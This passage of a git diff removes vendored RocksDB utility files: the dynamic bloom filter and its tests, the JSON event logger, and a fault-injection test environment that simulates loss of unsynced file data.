-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      // Since CACHE_LINE_SIZE is defined as 2^n, this line will be optimized
-      // to a simple and operation by compiler.
-      const uint32_t bitpos = b + (h % (CACHE_LINE_SIZE * 8));
-      or_func(&data_[bitpos / 8], (1 << (bitpos % 8)));
-      // Rotate h so that we don't reuse the same bytes.
-      h = h / (CACHE_LINE_SIZE * 8) +
-          (h % (CACHE_LINE_SIZE * 8)) * (0x20000000U / CACHE_LINE_SIZE);
-      h += delta;
-    }
-  } else {
-    for (uint32_t i = 0; i < kNumProbes; ++i) {
-      const uint32_t bitpos = h % kTotalBits;
-      or_func(&data_[bitpos / 8], (1 << (bitpos % 8)));
-      h += delta;
-    }
-  }
-}
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/dynamic_bloom_test.cc b/thirdparty/rocksdb/util/dynamic_bloom_test.cc
deleted file mode 100644
index f50036b..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom_test.cc
+++ /dev/null
@@ -1,340 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <algorithm>
-#include <atomic>
-#include <functional>
-#include <memory>
-#include <thread>
-#include <vector>
-
-#include "dynamic_bloom.h"
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/stop_watch.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-DEFINE_int32(bits_per_key, 10, "");
-DEFINE_int32(num_probes, 6, "");
-DEFINE_bool(enable_perf, false, "");
-
-namespace rocksdb {
-
-static Slice Key(uint64_t i, char* buffer) {
-  memcpy(buffer, &i, sizeof(i));
-  return Slice(buffer, sizeof(i));
-}
-
-class DynamicBloomTest : public testing::Test {};
-
-TEST_F(DynamicBloomTest, EmptyFilter) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  ASSERT_TRUE(!bloom1.MayContain("hello"));
-  ASSERT_TRUE(!bloom1.MayContain("world"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  ASSERT_TRUE(!bloom2.MayContain("hello"));
-  ASSERT_TRUE(!bloom2.MayContain("world"));
-}
-
-TEST_F(DynamicBloomTest, Small) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  bloom1.Add("hello");
-  bloom1.Add("world");
-  ASSERT_TRUE(bloom1.MayContain("hello"));
-  ASSERT_TRUE(bloom1.MayContain("world"));
-  ASSERT_TRUE(!bloom1.MayContain("x"));
-  ASSERT_TRUE(!bloom1.MayContain("foo"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  bloom2.Add("hello");
-  bloom2.Add("world");
-  ASSERT_TRUE(bloom2.MayContain("hello"));
-  ASSERT_TRUE(bloom2.MayContain("world"));
-  ASSERT_TRUE(!bloom2.MayContain("x"));
-  ASSERT_TRUE(!bloom2.MayContain("foo"));
-}
-
-TEST_F(DynamicBloomTest, SmallConcurrentAdd) {
-  Arena arena;
-  DynamicBloom bloom1(&arena, 100, 0, 2);
-  bloom1.AddConcurrently("hello");
-  bloom1.AddConcurrently("world");
-  ASSERT_TRUE(bloom1.MayContain("hello"));
-  ASSERT_TRUE(bloom1.MayContain("world"));
-  ASSERT_TRUE(!bloom1.MayContain("x"));
-  ASSERT_TRUE(!bloom1.MayContain("foo"));
-
-  DynamicBloom bloom2(&arena, CACHE_LINE_SIZE * 8 * 2 - 1, 1, 2);
-  bloom2.AddConcurrently("hello");
-  bloom2.AddConcurrently("world");
-  ASSERT_TRUE(bloom2.MayContain("hello"));
-  ASSERT_TRUE(bloom2.MayContain("world"));
-  ASSERT_TRUE(!bloom2.MayContain("x"));
-  ASSERT_TRUE(!bloom2.MayContain("foo"));
-}
-
-static uint32_t NextNum(uint32_t num) {
-  if (num < 10) {
-    num += 1;
-  } else if (num < 100) {
-    num += 10;
-  } else if (num < 1000) {
-    num += 100;
-  } else {
-    num += 1000;
-  }
-  return num;
-}
-
-TEST_F(DynamicBloomTest, VaryingLengths) {
-  char buffer[sizeof(uint64_t)];
-
-  // Count number of filters that significantly exceed the false positive rate
-  int mediocre_filters = 0;
-  int good_filters = 0;
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  fprintf(stderr, "bits_per_key: %d  num_probes: %d\n", FLAGS_bits_per_key,
-          num_probes);
-
-  for (uint32_t enable_locality = 0; enable_locality < 2; ++enable_locality) {
-    for (uint32_t num = 1; num <= 10000; num = NextNum(num)) {
-      uint32_t bloom_bits = 0;
-      Arena arena;
-      if (enable_locality == 0) {
-        bloom_bits = std::max(num * FLAGS_bits_per_key, 64U);
-      } else {
-        bloom_bits = std::max(num * FLAGS_bits_per_key,
-                              enable_locality * CACHE_LINE_SIZE * 8);
-      }
-      DynamicBloom bloom(&arena, bloom_bits, enable_locality, num_probes);
-      for (uint64_t i = 0; i < num; i++) {
-        bloom.Add(Key(i, buffer));
-        ASSERT_TRUE(bloom.MayContain(Key(i, buffer)));
-      }
-
-      // All added keys must match
-      for (uint64_t i = 0; i < num; i++) {
-        ASSERT_TRUE(bloom.MayContain(Key(i, buffer))) << "Num " << num
-                                                      << "; key " << i;
-      }
-
-      // Check false positive rate
-
-      int result = 0;
-      for (uint64_t i = 0; i < 10000; i++) {
-        if (bloom.MayContain(Key(i + 1000000000, buffer))) {
-          result++;
-        }
-      }
-      double rate = result / 10000.0;
-
-      fprintf(stderr,
-              "False positives: %5.2f%% @ num = %6u, bloom_bits = %6u, "
-              "enable locality?%u\n",
-              rate * 100.0, num, bloom_bits, enable_locality);
-
-      if (rate > 0.0125)
-        mediocre_filters++;  // Allowed, but not too often
-      else
-        good_filters++;
-    }
-
-    fprintf(stderr, "Filters: %d good, %d mediocre\n", good_filters,
-            mediocre_filters);
-    ASSERT_LE(mediocre_filters, good_filters / 5);
-  }
-}
-
-TEST_F(DynamicBloomTest, perf) {
-  StopWatchNano timer(Env::Default());
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  if (!FLAGS_enable_perf) {
-    return;
-  }
-
-  for (uint32_t m = 1; m <= 8; ++m) {
-    Arena arena;
-    const uint32_t num_keys = m * 8 * 1024 * 1024;
-    fprintf(stderr, "testing %" PRIu32 "M keys\n", m * 8);
-
-    DynamicBloom std_bloom(&arena, num_keys * 10, 0, num_probes);
-
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      std_bloom.Add(Slice(reinterpret_cast<const char*>(&i), 8));
-    }
-
-    uint64_t elapsed = timer.ElapsedNanos();
-    fprintf(stderr, "standard bloom, avg add latency %" PRIu64 "\n",
-            elapsed / num_keys);
-
-    uint32_t count = 0;
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      if (std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8))) {
-        ++count;
-      }
-    }
-    ASSERT_EQ(count, num_keys);
-    elapsed = timer.ElapsedNanos();
-    assert(count > 0);
-    fprintf(stderr, "standard bloom, avg query latency %" PRIu64 "\n",
-            elapsed / count);
-
-    // Locality enabled version
-    DynamicBloom blocked_bloom(&arena, num_keys * 10, 1, num_probes);
-
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      blocked_bloom.Add(Slice(reinterpret_cast<const char*>(&i), 8));
-    }
-
-    elapsed = timer.ElapsedNanos();
-    fprintf(stderr,
-            "blocked bloom(enable locality), avg add latency %" PRIu64 "\n",
-            elapsed / num_keys);
-
-    count = 0;
-    timer.Start();
-    for (uint64_t i = 1; i <= num_keys; ++i) {
-      if (blocked_bloom.MayContain(
-              Slice(reinterpret_cast<const char*>(&i), 8))) {
-        ++count;
-      }
-    }
-
-    elapsed = timer.ElapsedNanos();
-    assert(count > 0);
-    fprintf(stderr,
-            "blocked bloom(enable locality), avg query latency %" PRIu64 "\n",
-            elapsed / count);
-    ASSERT_TRUE(count == num_keys);
-  }
-}
-
-TEST_F(DynamicBloomTest, concurrent_with_perf) {
-  StopWatchNano timer(Env::Default());
-  uint32_t num_probes = static_cast<uint32_t>(FLAGS_num_probes);
-
-  uint32_t m_limit = FLAGS_enable_perf ? 8 : 1;
-  uint32_t locality_limit = FLAGS_enable_perf ? 1 : 0;
-
-  uint32_t num_threads = 4;
-  std::vector<port::Thread> threads;
-
-  for (uint32_t m = 1; m <= m_limit; ++m) {
-    for (uint32_t locality = 0; locality <= locality_limit; ++locality) {
-      Arena arena;
-      const uint32_t num_keys = m * 8 * 1024 * 1024;
-      fprintf(stderr, "testing %" PRIu32 "M keys with %" PRIu32 " locality\n",
-              m * 8, locality);
-
-      DynamicBloom std_bloom(&arena, num_keys * 10, locality, num_probes);
-
-      timer.Start();
-
-      std::function<void(size_t)> adder = [&](size_t t) {
-        for (uint64_t i = 1 + t; i <= num_keys; i += num_threads) {
-          std_bloom.AddConcurrently(
-              Slice(reinterpret_cast<const char*>(&i), 8));
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(adder, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      uint64_t elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel add latency %" PRIu64
-                      " nanos/key\n",
-              elapsed / num_keys);
-
-      timer.Start();
-
-      std::function<void(size_t)> hitter = [&](size_t t) {
-        for (uint64_t i = 1 + t; i <= num_keys; i += num_threads) {
-          bool f =
-              std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8));
-          ASSERT_TRUE(f);
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(hitter, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel hit latency %" PRIu64
-                      " nanos/key\n",
-              elapsed / num_keys);
-
-      timer.Start();
-
-      std::atomic<uint32_t> false_positives(0);
-      std::function<void(size_t)> misser = [&](size_t t) {
-        for (uint64_t i = num_keys + 1 + t; i <= 2 * num_keys;
-             i += num_threads) {
-          bool f =
-              std_bloom.MayContain(Slice(reinterpret_cast<const char*>(&i), 8));
-          if (f) {
-            ++false_positives;
-          }
-        }
-      };
-      for (size_t t = 0; t < num_threads; ++t) {
-        threads.emplace_back(misser, t);
-      }
-      while (threads.size() > 0) {
-        threads.back().join();
-        threads.pop_back();
-      }
-
-      elapsed = timer.ElapsedNanos();
-      fprintf(stderr, "standard bloom, avg parallel miss latency %" PRIu64
-                      " nanos/key, %f%% false positive rate\n",
-              elapsed / num_keys, false_positives.load() * 100.0 / num_keys);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  return RUN_ALL_TESTS();
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/event_logger.cc b/thirdparty/rocksdb/util/event_logger.cc
deleted file mode 100644
index b488984..0000000
--- a/thirdparty/rocksdb/util/event_logger.cc
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/event_logger.h"
-
-#include <inttypes.h>
-#include <cassert>
-#include <sstream>
-#include <string>
-
-#include "util/logging.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-
-EventLoggerStream::EventLoggerStream(Logger* logger)
-    : logger_(logger), log_buffer_(nullptr), json_writer_(nullptr) {}
-
-EventLoggerStream::EventLoggerStream(LogBuffer* log_buffer)
-    : logger_(nullptr), log_buffer_(log_buffer), json_writer_(nullptr) {}
-
-EventLoggerStream::~EventLoggerStream() {
-  if (json_writer_) {
-    json_writer_->EndObject();
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-    printf("%s\n", json_writer_->Get().c_str());
-#else
-    if (logger_) {
-      EventLogger::Log(logger_, *json_writer_);
-    } else if (log_buffer_) {
-      EventLogger::LogToBuffer(log_buffer_, *json_writer_);
-    }
-#endif
-    delete json_writer_;
-  }
-}
-
-void EventLogger::Log(const JSONWriter& jwriter) {
-  Log(logger_, jwriter);
-}
-
-void EventLogger::Log(Logger* logger, const JSONWriter& jwriter) {
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-  printf("%s\n", jwriter.Get().c_str());
-#else
-  rocksdb::Log(logger, "%s %s", Prefix(), jwriter.Get().c_str());
-#endif
-}
-
-void EventLogger::LogToBuffer(
-    LogBuffer* log_buffer, const JSONWriter& jwriter) {
-#ifdef ROCKSDB_PRINT_EVENTS_TO_STDOUT
-  printf("%s\n", jwriter.Get().c_str());
-#else
-  assert(log_buffer);
-  rocksdb::LogToBuffer(log_buffer, "%s %s", Prefix(), jwriter.Get().c_str());
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/event_logger.h b/thirdparty/rocksdb/util/event_logger.h
deleted file mode 100644
index d88a6a4..0000000
--- a/thirdparty/rocksdb/util/event_logger.h
+++ /dev/null
@@ -1,196 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <memory>
-#include <sstream>
-#include <string>
-#include <chrono>
-
-#include "rocksdb/env.h"
-#include "util/log_buffer.h"
-
-namespace rocksdb {
-
-class JSONWriter {
- public:
-  JSONWriter() : state_(kExpectKey), first_element_(true), in_array_(false) {
-    stream_ << "{";
-  }
-
-  void AddKey(const std::string& key) {
-    assert(state_ == kExpectKey);
-    if (!first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << "\"" << key << "\": ";
-    state_ = kExpectValue;
-    first_element_ = false;
-  }
-
-  void AddValue(const char* value) {
-    assert(state_ == kExpectValue || state_ == kInArray);
-    if (state_ == kInArray && !first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << "\"" << value << "\"";
-    if (state_ != kInArray) {
-      state_ = kExpectKey;
-    }
-    first_element_ = false;
-  }
-
-  template <typename T>
-  void AddValue(const T& value) {
-    assert(state_ == kExpectValue || state_ == kInArray);
-    if (state_ == kInArray && !first_element_) {
-      stream_ << ", ";
-    }
-    stream_ << value;
-    if (state_ != kInArray) {
-      state_ = kExpectKey;
-    }
-    first_element_ = false;
-  }
-
-  void StartArray() {
-    assert(state_ == kExpectValue);
-    state_ = kInArray;
-    in_array_ = true;
-    stream_ << "[";
-    first_element_ = true;
-  }
-
-  void EndArray() {
-    assert(state_ == kInArray);
-    state_ = kExpectKey;
-    in_array_ = false;
-    stream_ << "]";
-    first_element_ = false;
-  }
-
-  void StartObject() {
-    assert(state_ == kExpectValue);
-    state_ = kExpectKey;
-    stream_ << "{";
-    first_element_ = true;
-  }
-
-  void EndObject() {
-    assert(state_ == kExpectKey);
-    stream_ << "}";
-    first_element_ = false;
-  }
-
-  void StartArrayedObject() {
-    assert(state_ == kInArray && in_array_);
-    state_ = kExpectValue;
-    if (!first_element_) {
-      stream_ << ", ";
-    }
-    StartObject();
-  }
-
-  void EndArrayedObject() {
-    assert(in_array_);
-    EndObject();
-    state_ = kInArray;
-  }
-
-  std::string Get() const { return stream_.str(); }
-
-  JSONWriter& operator<<(const char* val) {
-    if (state_ == kExpectKey) {
-      AddKey(val);
-    } else {
-      AddValue(val);
-    }
-    return *this;
-  }
-
-  JSONWriter& operator<<(const std::string& val) {
-    return *this << val.c_str();
-  }
-
-  template <typename T>
-  JSONWriter& operator<<(const T& val) {
-    assert(state_ != kExpectKey);
-    AddValue(val);
-    return *this;
-  }
-
- private:
-  enum JSONWriterState {
-    kExpectKey,
-    kExpectValue,
-    kInArray,
-    kInArrayedObject,
-  };
-  JSONWriterState state_;
-  bool first_element_;
-  bool in_array_;
-  std::ostringstream stream_;
-};
-
-class EventLoggerStream {
- public:
-  template <typename T>
-  EventLoggerStream& operator<<(const T& val) {
-    MakeStream();
-    *json_writer_ << val;
-    return *this;
-  }
-
-  void StartArray() { json_writer_->StartArray(); }
-  void EndArray() { json_writer_->EndArray(); }
-  void StartObject() { json_writer_->StartObject(); }
-  void EndObject() { json_writer_->EndObject(); }
-
-  ~EventLoggerStream();
-
- private:
-  void MakeStream() {
-    if (!json_writer_) {
-      json_writer_ = new JSONWriter();
-      *this << "time_micros"
-            << std::chrono::duration_cast<std::chrono::microseconds>(
-                   std::chrono::system_clock::now().time_since_epoch()).count();
-    }
-  }
-  friend class EventLogger;
-  explicit EventLoggerStream(Logger* logger);
-  explicit EventLoggerStream(LogBuffer* log_buffer);
-  // exactly one is non-nullptr
-  Logger* const logger_;
-  LogBuffer* const log_buffer_;
-  // ownership
-  JSONWriter* json_writer_;
-};
-
-// here is an example of the output that will show up in the LOG:
-// 2015/01/15-14:13:25.788019 1105ef000 EVENT_LOG_v1 {"time_micros":
-// 1421360005788015, "event": "table_file_creation", "file_number": 12,
-// "file_size": 1909699}
-class EventLogger {
- public:
-  static const char* Prefix() {
-    return "EVENT_LOG_v1";
-  }
-
-  explicit EventLogger(Logger* logger) : logger_(logger) {}
-  EventLoggerStream Log() { return EventLoggerStream(logger_); }
-  EventLoggerStream LogToBuffer(LogBuffer* log_buffer) {
-    return EventLoggerStream(log_buffer);
-  }
-  void Log(const JSONWriter& jwriter);
-  static void Log(Logger* logger, const JSONWriter& jwriter);
-  static void LogToBuffer(LogBuffer* log_buffer, const JSONWriter& jwriter);
-
- private:
-  Logger* logger_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/event_logger_test.cc b/thirdparty/rocksdb/util/event_logger_test.cc
deleted file mode 100644
index 13b6394..0000000
--- a/thirdparty/rocksdb/util/event_logger_test.cc
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-
-#include "util/event_logger.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EventLoggerTest : public testing::Test {};
-
-class StringLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    vsnprintf(buffer_, sizeof(buffer_), format, ap);
-  }
-  char* buffer() { return buffer_; }
-
- private:
-  char buffer_[1000];
-};
-
-TEST_F(EventLoggerTest, SimpleTest) {
-  StringLogger logger;
-  EventLogger event_logger(&logger);
-  event_logger.Log() << "id" << 5 << "event"
-                     << "just_testing";
-  std::string output(logger.buffer());
-  ASSERT_TRUE(output.find("\"event\": \"just_testing\"") != std::string::npos);
-  ASSERT_TRUE(output.find("\"id\": 5") != std::string::npos);
-  ASSERT_TRUE(output.find("\"time_micros\"") != std::string::npos);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/fault_injection_test_env.cc b/thirdparty/rocksdb/util/fault_injection_test_env.cc
deleted file mode 100644
index 3b3a8b9..0000000
--- a/thirdparty/rocksdb/util/fault_injection_test_env.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#include "util/fault_injection_test_env.h"
-#include <functional>
-#include <utility>
-
-namespace rocksdb {
-
-// Assume a filename, and not a directory name like "/foo/bar/"
-std::string GetDirName(const std::string filename) {
-  size_t found = filename.find_last_of("/\\");
-  if (found == std::string::npos) {
-    return "";
-  } else {
-    return filename.substr(0, found);
-  }
-}
-
-// A basic file truncation function suitable for this test.
-Status Truncate(Env* env, const std::string& filename, uint64_t length) {
-  unique_ptr<SequentialFile> orig_file;
-  const EnvOptions options;
-  Status s = env->NewSequentialFile(filename, &orig_file, options);
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot truncate file %s: %s\n", filename.c_str(),
-            s.ToString().c_str());
-    return s;
-  }
-
-  std::unique_ptr<char[]> scratch(new char[length]);
-  rocksdb::Slice result;
-  s = orig_file->Read(length, &result, scratch.get());
-#ifdef OS_WIN
-  orig_file.reset();
-#endif
-  if (s.ok()) {
-    std::string tmp_name = GetDirName(filename) + "/truncate.tmp";
-    unique_ptr<WritableFile> tmp_file;
-    s = env->NewWritableFile(tmp_name, &tmp_file, options);
-    if (s.ok()) {
-      s = tmp_file->Append(result);
-      if (s.ok()) {
-        s = env->RenameFile(tmp_name, filename);
-      } else {
-        fprintf(stderr, "Cannot rename file %s to %s: %s\n", tmp_name.c_str(),
-                filename.c_str(), s.ToString().c_str());
-        env->DeleteFile(tmp_name);
-      }
-    }
-  }
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot truncate file %s: %s\n", filename.c_str(),
-            s.ToString().c_str());
-  }
-
-  return s;
-}
-
-// Trim the tailing "/" in the end of `str`
-std::string TrimDirname(const std::string& str) {
-  size_t found = str.find_last_not_of("/");
-  if (found == std::string::npos) {
-    return str;
-  }
-  return str.substr(0, found + 1);
-}
-
-// Return pair <parent directory name, file name> of a full path.
-std::pair<std::string, std::string> GetDirAndName(const std::string& name) {
-  std::string dirname = GetDirName(name);
-  std::string fname = name.substr(dirname.size() + 1);
-  return std::make_pair(dirname, fname);
-}
-
-Status FileState::DropUnsyncedData(Env* env) const {
-  ssize_t sync_pos = pos_at_last_sync_ == -1 ? 0 : pos_at_last_sync_;
-  return Truncate(env, filename_, sync_pos);
-}
-
-Status FileState::DropRandomUnsyncedData(Env* env, Random* rand) const {
-  ssize_t sync_pos = pos_at_last_sync_ == -1 ? 0 : pos_at_last_sync_;
-  assert(pos_ >= sync_pos);
-  int range = static_cast<int>(pos_ - sync_pos);
-  uint64_t truncated_size =
-      static_cast<uint64_t>(sync_pos) + rand->Uniform(range);
-  return Truncate(env, filename_, truncated_size);
-}
-
-Status TestDirectory::Fsync() {
-  env_->SyncDir(dirname_);
-  return dir_->Fsync();
-}
-
-TestWritableFile::TestWritableFile(const std::string& fname,
-                                   unique_ptr<WritableFile>&& f,
-                                   FaultInjectionTestEnv* env)
-    : state_(fname),
-      target_(std::move(f)),
-      writable_file_opened_(true),
-      env_(env) {
-  assert(target_ != nullptr);
-  state_.pos_ = 0;
-}
-
-TestWritableFile::~TestWritableFile() {
-  if (writable_file_opened_) {
-    Close();
-  }
-}
-
-Status TestWritableFile::Append(const Slice& data) {
-  if (!env_->IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status s = target_->Append(data);
-  if (s.ok()) {
-    state_.pos_ += data.size();
-  }
-  return s;
-}
-
-Status TestWritableFile::Close() {
-  writable_file_opened_ = false;
-  Status s = target_->Close();
-  if (s.ok()) {
-    env_->WritableFileClosed(state_);
-  }
-  return s;
-}
-
-Status TestWritableFile::Flush() {
-  Status s = target_->Flush();
-  if (s.ok() && env_->IsFilesystemActive()) {
-    state_.pos_at_last_flush_ = state_.pos_;
-  }
-  return s;
-}
-
-Status TestWritableFile::Sync() {
-  if (!env_->IsFilesystemActive()) {
-    return Status::IOError("FaultInjectionTestEnv: not active");
-  }
-  // No need to actual sync.
-  state_.pos_at_last_sync_ = state_.pos_;
-  return Status::OK();
-}
-
-Status FaultInjectionTestEnv::NewDirectory(const std::string& name,
-                                           unique_ptr<Directory>* result) {
-  unique_ptr<Directory> r;
-  Status s = target()->NewDirectory(name, &r);
-  assert(s.ok());
-  if (!s.ok()) {
-    return s;
-  }
-  result->reset(new TestDirectory(this, TrimDirname(name), r.release()));
-  return Status::OK();
-}
-
-Status FaultInjectionTestEnv::NewWritableFile(const std::string& fname,
-                                              unique_ptr<WritableFile>* result,
-                                              const EnvOptions& soptions) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  // Not allow overwriting files
-  Status s = target()->FileExists(fname);
-  if (s.ok()) {
-    return Status::Corruption("File already exists.");
-  } else if (!s.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-  s = target()->NewWritableFile(fname, result, soptions);
-  if (s.ok()) {
-    result->reset(new TestWritableFile(fname, std::move(*result), this));
-    // WritableFileWriter* file is opened
-    // again then it will be truncated - so forget our saved state.
-    UntrackFile(fname);
-    MutexLock l(&mutex_);
-    open_files_.insert(fname);
-    auto dir_and_name = GetDirAndName(fname);
-    auto& list = dir_to_new_files_since_last_sync_[dir_and_name.first];
-    list.insert(dir_and_name.second);
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::DeleteFile(const std::string& f) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status s = EnvWrapper::DeleteFile(f);
-  if (!s.ok()) {
-    fprintf(stderr, "Cannot delete file %s: %s\n", f.c_str(),
-            s.ToString().c_str());
-  }
-  assert(s.ok());
-  if (s.ok()) {
-    UntrackFile(f);
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::RenameFile(const std::string& s,
-                                         const std::string& t) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status ret = EnvWrapper::RenameFile(s, t);
-
-  if (ret.ok()) {
-    MutexLock l(&mutex_);
-    if (db_file_state_.find(s) != db_file_state_.end()) {
-      db_file_state_[t] = db_file_state_[s];
-      db_file_state_.erase(s);
-    }
-
-    auto sdn = GetDirAndName(s);
-    auto tdn = GetDirAndName(t);
-    if (dir_to_new_files_since_last_sync_[sdn.first].erase(sdn.second) != 0) {
-      auto& tlist = dir_to_new_files_since_last_sync_[tdn.first];
-      assert(tlist.find(tdn.second) == tlist.end());
-      tlist.insert(tdn.second);
-    }
-  }
-
-  return ret;
-}
-
-void FaultInjectionTestEnv::WritableFileClosed(const FileState& state) {
-  MutexLock l(&mutex_);
-  if (open_files_.find(state.filename_) != open_files_.end()) {
-    db_file_state_[state.filename_] = state;
-    open_files_.erase(state.filename_);
-  }
-}
-
-// For every file that is not fully synced, make a call to `func` with
-// FileState of the file as the parameter.
-Status FaultInjectionTestEnv::DropFileData(
-    std::function<Status(Env*, FileState)> func) {
-  Status s;
-  MutexLock l(&mutex_);
-  for (std::map<std::string, FileState>::const_iterator it =
-           db_file_state_.begin();
-       s.ok() && it != db_file_state_.end(); ++it) {
-    const FileState& state = it->second;
-    if (!state.IsFullySynced()) {
-      s = func(target(), state);
-    }
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::DropUnsyncedFileData() {
-  return DropFileData([&](Env* env, const FileState& state) {
-    return state.DropUnsyncedData(env);
-  });
-}
-
-Status FaultInjectionTestEnv::DropRandomUnsyncedFileData(Random* rnd) {
-  return DropFileData([&](Env* env, const FileState& state) {
-    return state.DropRandomUnsyncedData(env, rnd);
-  });
-}
-
-Status FaultInjectionTestEnv::DeleteFilesCreatedAfterLastDirSync() {
-  // Because DeleteFile access this container make a copy to avoid deadlock
-  std::map<std::string, std::set<std::string>> map_copy;
-  {
-    MutexLock l(&mutex_);
-    map_copy.insert(dir_to_new_files_since_last_sync_.begin(),
-                    dir_to_new_files_since_last_sync_.end());
-  }
-
-  for (auto& pair : map_copy) {
-    for (std::string name : pair.second) {
-      Status s = DeleteFile(pair.first + "/" + name);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-void FaultInjectionTestEnv::ResetState() {
-  MutexLock l(&mutex_);
-  db_file_state_.clear();
-  dir_to_new_files_since_last_sync_.clear();
-  SetFilesystemActiveNoLock(true);
-}
-
-void FaultInjectionTestEnv::UntrackFile(const std::string& f) {
-  MutexLock l(&mutex_);
-  auto dir_and_name = GetDirAndName(f);
-  dir_to_new_files_since_last_sync_[dir_and_name.first].erase(
-      dir_and_name.second);
-  db_file_state_.erase(f);
-  open_files_.erase(f);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/fault_injection_test_env.h b/thirdparty/rocksdb/util/fault_injection_test_env.h
deleted file mode 100644
index 5d0ae63..0000000
--- a/thirdparty/rocksdb/util/fault_injection_test_env.h
+++ /dev/null
@@ -1,159 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
